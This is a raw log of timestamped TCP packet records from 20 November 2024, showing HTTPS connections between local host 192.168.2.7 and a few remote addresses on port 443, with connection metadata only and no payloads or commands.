                                                                                                                                                                                                Nov 20, 2024 10:54:49.332994938 CET4434991913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:49.338001013 CET49927443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:49.338036060 CET4434992713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:49.338654995 CET49927443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:49.338669062 CET49928443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:49.338699102 CET4434992813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:49.338762999 CET49928443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:49.340548992 CET49929443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:49.340579033 CET4434992913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:49.340642929 CET49929443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:49.341440916 CET49930443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:49.341449022 CET4434993013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:49.341721058 CET49930443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:49.341856003 CET49927443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:49.341878891 CET4434992713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:49.342015982 CET49928443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:49.342029095 CET4434992813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:49.344626904 CET49931443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:49.344635963 CET4434993113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:49.345065117 CET49929443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:49.345078945 CET4434992913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:49.345108986 CET49931443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:49.345226049 CET49931443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:49.345240116 CET4434993113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:49.345288038 CET49930443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:49.345299959 CET4434993013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:49.410614967 CET49932443192.168.2.7184.28.90.27
                                                                                                                                                                                                Nov 20, 2024 10:54:49.410625935 CET44349932184.28.90.27192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:49.410758972 CET49932443192.168.2.7184.28.90.27
                                                                                                                                                                                                Nov 20, 2024 10:54:49.412168980 CET49932443192.168.2.7184.28.90.27
                                                                                                                                                                                                Nov 20, 2024 10:54:49.412182093 CET44349932184.28.90.27192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:49.567497015 CET49933443192.168.2.713.107.246.60
                                                                                                                                                                                                Nov 20, 2024 10:54:49.567534924 CET4434993313.107.246.60192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:49.567605972 CET49933443192.168.2.713.107.246.60
                                                                                                                                                                                                Nov 20, 2024 10:54:49.567806005 CET49934443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:49.567812920 CET4434993413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:49.567867994 CET49934443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:49.568094969 CET49934443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:49.568109035 CET4434993413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:49.568341970 CET49933443192.168.2.713.107.246.60
                                                                                                                                                                                                Nov 20, 2024 10:54:49.568352938 CET4434993313.107.246.60192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:49.996232033 CET4434992913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:49.996768951 CET49929443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:49.996788979 CET4434992913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:49.997450113 CET49929443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:49.997454882 CET4434992913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.000984907 CET4434993013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.001286983 CET49930443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:50.001316071 CET4434993013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.001795053 CET49930443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:50.001801968 CET4434993013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.004410982 CET4434993113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.004956007 CET49931443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:50.004971981 CET4434993113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.005316019 CET49931443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:50.005321026 CET4434993113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.006970882 CET4434992813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.007287025 CET49928443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:50.007306099 CET4434992813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.007694006 CET49928443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:50.007698059 CET4434992813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.103358030 CET4434993013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.103830099 CET4434993013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.103899002 CET49930443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:50.107157946 CET4434992913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.107244015 CET4434992913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.107300997 CET49929443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:50.112550974 CET4434993113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.112787008 CET4434993113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.112837076 CET4434993113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.112843990 CET49931443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:50.112893105 CET49931443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:50.126050949 CET44349932184.28.90.27192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.126137018 CET49932443192.168.2.7184.28.90.27
                                                                                                                                                                                                Nov 20, 2024 10:54:50.156044960 CET49930443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:50.156044960 CET49930443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:50.156079054 CET4434993013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.156090975 CET4434993013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.159905910 CET49929443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:50.159912109 CET4434992913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.159917116 CET49929443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:50.159920931 CET4434992913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.160779953 CET49931443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:50.160779953 CET49931443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:50.160785913 CET4434993113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.160793066 CET4434993113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.193347931 CET49932443192.168.2.7184.28.90.27
                                                                                                                                                                                                Nov 20, 2024 10:54:50.193362951 CET44349932184.28.90.27192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.193701982 CET44349932184.28.90.27192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.194236040 CET49936443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:50.194256067 CET4434993613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.194401026 CET49936443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:50.195203066 CET49937443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:50.195241928 CET4434993713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.195358038 CET49937443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:50.196327925 CET49938443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:50.196336985 CET4434993813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.196428061 CET49938443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:50.196611881 CET49936443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:50.196621895 CET4434993613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.196949005 CET49937443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:50.196969986 CET4434993713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.198277950 CET49938443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:50.198290110 CET4434993813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.219197989 CET4434993413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.219484091 CET4434993313.107.246.60192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.219584942 CET49934443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:50.219599962 CET4434993413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.219700098 CET49933443192.168.2.713.107.246.60
                                                                                                                                                                                                Nov 20, 2024 10:54:50.219707012 CET4434993313.107.246.60192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.222848892 CET4434993413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.222902060 CET49934443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:50.222915888 CET4434993313.107.246.60192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.222978115 CET49933443192.168.2.713.107.246.60
                                                                                                                                                                                                Nov 20, 2024 10:54:50.223360062 CET49933443192.168.2.713.107.246.60
                                                                                                                                                                                                Nov 20, 2024 10:54:50.223436117 CET4434993313.107.246.60192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.223730087 CET49934443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:50.223784924 CET4434993413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.223911047 CET49933443192.168.2.713.107.246.60
                                                                                                                                                                                                Nov 20, 2024 10:54:50.223917007 CET4434993313.107.246.60192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.223957062 CET49934443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:50.223961115 CET4434993413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.234824896 CET49932443192.168.2.7184.28.90.27
                                                                                                                                                                                                Nov 20, 2024 10:54:50.247776031 CET49932443192.168.2.7184.28.90.27
                                                                                                                                                                                                Nov 20, 2024 10:54:50.266694069 CET49934443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:50.266776085 CET49933443192.168.2.713.107.246.60
                                                                                                                                                                                                Nov 20, 2024 10:54:50.271967888 CET4434992813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.272051096 CET4434992813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.272188902 CET49928443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:50.272283077 CET49928443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:50.272283077 CET49928443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:50.272301912 CET4434992813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.272313118 CET4434992813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.275249958 CET49939443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:50.275278091 CET4434993913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.275414944 CET49939443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:50.275626898 CET49939443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:50.275630951 CET4434993913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.295321941 CET44349932184.28.90.27192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.342041016 CET4434993313.107.246.60192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.342102051 CET4434993313.107.246.60192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.342137098 CET4434993313.107.246.60192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.342155933 CET4434993313.107.246.60192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.342156887 CET49933443192.168.2.713.107.246.60
                                                                                                                                                                                                Nov 20, 2024 10:54:50.342178106 CET4434993313.107.246.60192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.342200041 CET49933443192.168.2.713.107.246.60
                                                                                                                                                                                                Nov 20, 2024 10:54:50.342206955 CET4434993313.107.246.60192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.342221022 CET49933443192.168.2.713.107.246.60
                                                                                                                                                                                                Nov 20, 2024 10:54:50.342257977 CET49933443192.168.2.713.107.246.60
                                                                                                                                                                                                Nov 20, 2024 10:54:50.342838049 CET4434993413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.342890024 CET4434993413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.342909098 CET4434993413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.342941046 CET49934443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:50.342943907 CET4434993413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.342973948 CET4434993413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.342976093 CET49934443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:50.342991114 CET4434993413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.342998981 CET49934443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:50.343014002 CET49934443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:50.343036890 CET49934443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:50.426095009 CET4434993313.107.246.60192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.426122904 CET4434993313.107.246.60192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.426187038 CET49933443192.168.2.713.107.246.60
                                                                                                                                                                                                Nov 20, 2024 10:54:50.426196098 CET4434993313.107.246.60192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.426230907 CET49933443192.168.2.713.107.246.60
                                                                                                                                                                                                Nov 20, 2024 10:54:50.426249027 CET49933443192.168.2.713.107.246.60
                                                                                                                                                                                                Nov 20, 2024 10:54:50.427371025 CET4434993413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.427392006 CET4434993413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.427428961 CET4434993413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.427439928 CET49934443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:50.427444935 CET4434993413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.427489996 CET49934443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:50.428853989 CET4434993313.107.246.60192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.428874969 CET4434993313.107.246.60192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.428914070 CET49933443192.168.2.713.107.246.60
                                                                                                                                                                                                Nov 20, 2024 10:54:50.428920031 CET4434993313.107.246.60192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.428951979 CET49933443192.168.2.713.107.246.60
                                                                                                                                                                                                Nov 20, 2024 10:54:50.428966045 CET49933443192.168.2.713.107.246.60
                                                                                                                                                                                                Nov 20, 2024 10:54:50.430354118 CET4434993413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.430368900 CET4434993413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.430439949 CET49934443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:50.430444002 CET4434993413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.431169987 CET4434993413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.431205988 CET49934443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:50.431210995 CET4434993413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.431246996 CET49934443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:50.431269884 CET4434993413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.431309938 CET49934443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:50.431463957 CET49934443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:50.431476116 CET4434993413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.466131926 CET44349932184.28.90.27192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.466310024 CET49932443192.168.2.7184.28.90.27
                                                                                                                                                                                                Nov 20, 2024 10:54:50.466325998 CET44349932184.28.90.27192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.466356993 CET49932443192.168.2.7184.28.90.27
                                                                                                                                                                                                Nov 20, 2024 10:54:50.466439962 CET44349932184.28.90.27192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.466468096 CET44349932184.28.90.27192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.466638088 CET49932443192.168.2.7184.28.90.27
                                                                                                                                                                                                Nov 20, 2024 10:54:50.509174109 CET49944443192.168.2.7184.28.90.27
                                                                                                                                                                                                Nov 20, 2024 10:54:50.509185076 CET44349944184.28.90.27192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.509438992 CET49944443192.168.2.7184.28.90.27
                                                                                                                                                                                                Nov 20, 2024 10:54:50.509708881 CET49944443192.168.2.7184.28.90.27
                                                                                                                                                                                                Nov 20, 2024 10:54:50.509720087 CET44349944184.28.90.27192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.511358023 CET4434993313.107.246.60192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.511389971 CET4434993313.107.246.60192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.511424065 CET49933443192.168.2.713.107.246.60
                                                                                                                                                                                                Nov 20, 2024 10:54:50.511439085 CET4434993313.107.246.60192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.511466026 CET49933443192.168.2.713.107.246.60
                                                                                                                                                                                                Nov 20, 2024 10:54:50.511485100 CET49933443192.168.2.713.107.246.60
                                                                                                                                                                                                Nov 20, 2024 10:54:50.512721062 CET4434993313.107.246.60192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.512743950 CET4434993313.107.246.60192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.512778044 CET49933443192.168.2.713.107.246.60
                                                                                                                                                                                                Nov 20, 2024 10:54:50.512784958 CET4434993313.107.246.60192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.512820005 CET49933443192.168.2.713.107.246.60
                                                                                                                                                                                                Nov 20, 2024 10:54:50.514508009 CET4434993313.107.246.60192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.514528036 CET4434993313.107.246.60192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.514581919 CET49933443192.168.2.713.107.246.60
                                                                                                                                                                                                Nov 20, 2024 10:54:50.514588118 CET4434993313.107.246.60192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.514903069 CET49933443192.168.2.713.107.246.60
                                                                                                                                                                                                Nov 20, 2024 10:54:50.516275883 CET4434993313.107.246.60192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.516295910 CET4434993313.107.246.60192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.516330957 CET49933443192.168.2.713.107.246.60
                                                                                                                                                                                                Nov 20, 2024 10:54:50.516335964 CET4434993313.107.246.60192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.516366959 CET49933443192.168.2.713.107.246.60
                                                                                                                                                                                                Nov 20, 2024 10:54:50.516387939 CET49933443192.168.2.713.107.246.60
                                                                                                                                                                                                Nov 20, 2024 10:54:50.599611044 CET4434993313.107.246.60192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.599675894 CET4434993313.107.246.60192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.599683046 CET49933443192.168.2.713.107.246.60
                                                                                                                                                                                                Nov 20, 2024 10:54:50.599689960 CET4434993313.107.246.60192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.599723101 CET49933443192.168.2.713.107.246.60
                                                                                                                                                                                                Nov 20, 2024 10:54:50.601159096 CET4434993313.107.246.60192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.601185083 CET4434993313.107.246.60192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.601222038 CET49933443192.168.2.713.107.246.60
                                                                                                                                                                                                Nov 20, 2024 10:54:50.601226091 CET4434993313.107.246.60192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.601258993 CET49933443192.168.2.713.107.246.60
                                                                                                                                                                                                Nov 20, 2024 10:54:50.601279020 CET49933443192.168.2.713.107.246.60
                                                                                                                                                                                                Nov 20, 2024 10:54:50.603105068 CET4434993313.107.246.60192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.603135109 CET4434993313.107.246.60192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.603172064 CET49933443192.168.2.713.107.246.60
                                                                                                                                                                                                Nov 20, 2024 10:54:50.603177071 CET4434993313.107.246.60192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.603200912 CET49933443192.168.2.713.107.246.60
                                                                                                                                                                                                Nov 20, 2024 10:54:50.603219986 CET49933443192.168.2.713.107.246.60
                                                                                                                                                                                                Nov 20, 2024 10:54:50.604800940 CET4434993313.107.246.60192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.604825020 CET4434993313.107.246.60192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.604886055 CET49933443192.168.2.713.107.246.60
                                                                                                                                                                                                Nov 20, 2024 10:54:50.604890108 CET4434993313.107.246.60192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.604929924 CET49933443192.168.2.713.107.246.60
                                                                                                                                                                                                Nov 20, 2024 10:54:50.606657028 CET4434993313.107.246.60192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.606678963 CET4434993313.107.246.60192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.606719017 CET49933443192.168.2.713.107.246.60
                                                                                                                                                                                                Nov 20, 2024 10:54:50.606724977 CET4434993313.107.246.60192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.606762886 CET49933443192.168.2.713.107.246.60
                                                                                                                                                                                                Nov 20, 2024 10:54:50.607472897 CET4434993313.107.246.60192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.607527971 CET4434993313.107.246.60192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.607543945 CET49933443192.168.2.713.107.246.60
                                                                                                                                                                                                Nov 20, 2024 10:54:50.607548952 CET4434993313.107.246.60192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.607578993 CET49933443192.168.2.713.107.246.60
                                                                                                                                                                                                Nov 20, 2024 10:54:50.607580900 CET4434993313.107.246.60192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.607623100 CET49933443192.168.2.713.107.246.60
                                                                                                                                                                                                Nov 20, 2024 10:54:50.607806921 CET49933443192.168.2.713.107.246.60
                                                                                                                                                                                                Nov 20, 2024 10:54:50.607814074 CET4434993313.107.246.60192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.841629028 CET4434993613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.842087984 CET49936443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:50.842139959 CET4434993613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.842786074 CET49936443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:50.842797995 CET4434993613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.852175951 CET4434993813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.852653980 CET49938443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:50.852720976 CET4434993813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.853475094 CET49938443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:50.853492022 CET4434993813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.868304968 CET4434993713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.869837999 CET49937443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:50.869864941 CET4434993713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.870263100 CET49937443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:50.870269060 CET4434993713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.941868067 CET4434993613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.942156076 CET4434993613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.942209005 CET49936443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:50.950515032 CET49936443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:50.950531006 CET4434993613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.950542927 CET49936443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:50.950551033 CET4434993613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.955727100 CET49950443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:50.955774069 CET4434995013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.956007004 CET4434993813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.956119061 CET49950443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:50.956778049 CET4434993813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.956829071 CET4434993813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.956837893 CET49938443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:50.956871986 CET49938443192.168.2.713.107.246.45
